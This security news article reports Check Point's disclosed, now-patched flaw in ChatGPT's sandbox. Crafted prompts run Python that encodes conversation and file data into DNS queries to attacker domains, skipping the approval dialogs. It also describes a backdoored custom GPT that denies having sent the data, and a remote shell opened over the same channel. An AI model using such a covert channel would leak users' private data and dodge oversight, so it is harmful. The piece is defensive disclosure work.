Check Point Research published technical analysis on March 30 demonstrating a DNS-based data exfiltration technique in ChatGPT’s code execution sandbox. The vulnerability allowed attackers to encode conversation data, uploaded files, and AI-generated summaries into DNS queries sent from inside an environment designed to prevent outbound communication. OpenAI patched the flaw on February 20, 2026, after responsible disclosure by the researchers. The issue is closed. The pattern is worth understanding for any team deploying code execution in sandboxed environments.
The attack exploited a specific architectural asymmetry: the sandbox blocked HTTP requests and prevented custom network actions, but left DNS resolution unrestricted. Because DNS queries are typically treated as infrastructure operations rather than data transmission channels, the AI model itself treated them as harmless. Attackers could craft prompts that triggered Python code execution, encoding sensitive content into DNS subdomain queries sent to attacker-controlled domains. No user warnings appeared. No approval dialogs fired. By the time the data left the system, the exfiltration was complete.
How the Attack Worked
ChatGPT’s code execution and data analysis feature runs inside a sandboxed Linux container. OpenAI states that this environment “is unable to generate outbound network requests directly.” Direct HTTP calls are blocked. Legitimate outbound data sharing through custom GPT Actions requires explicit user approval with a dialog showing the destination and data being sent.
The Check Point researchers found a gap: DNS resolution remained unrestricted inside the container. DNS queries, typically treated as harmless infrastructure for resolving domain names, can encode arbitrary data in the subdomain portion of a request. By crafting a prompt that triggered Python code execution inside the sandbox, an attacker could encode sensitive conversation content into DNS queries sent to an attacker-controlled domain, according to The Register.
Because the AI model itself assumed the code execution environment was fully isolated, it did not flag the DNS activity as an external data transfer. No approval dialogs appeared. No warnings fired. The user saw a normal ChatGPT response while their data left the system through the DNS channel, per Check Point’s technical writeup.
Three Proof-of-Concept Attacks
Check Point demonstrated three exploitation scenarios. In one, a backdoored custom GPT posing as a health analyst ingested a user’s uploaded PDF containing lab results and personal information. When asked whether it had transmitted the data externally, ChatGPT “answered confidently that it had not, explaining that the file was only stored in a secure internal location,” The Register reported. The data had already been exfiltrated.
The researchers also showed the same hidden communication path could establish remote shell access inside the Linux runtime, enabling direct command execution, per the Check Point research paper.
The Pattern for Agent Builders
This is the second distinct OpenAI security disclosure in the past 48 hours. The Codex token exposure targeted developer tooling. Now the ChatGPT DNS exfiltration targets the platform’s core code execution infrastructure.
For teams building on top of AI platforms, the lesson from Check Point’s head of research Eli Smadja is direct: “Don’t assume AI tools are secure by default,” he wrote in Check Point’s blog summary. “Just as organizations learned not to blindly trust cloud providers, the same logic now applies to AI vendors.”
The DNS vector in particular matters for any AI system that runs code in a sandboxed environment. If the sandbox blocks HTTP but leaves DNS open, it has a data exfiltration channel. That applies to ChatGPT, to Codex, and to any agent framework that executes user-triggered code inside containers with network restrictions.
OpenAI fixed this specific flaw. But the underlying architectural assumption — that blocking HTTP constitutes network isolation — is shared across much of the AI agent infrastructure being built right now. Teams deploying agents that handle sensitive data in sandboxed code execution environments should audit their DNS policies.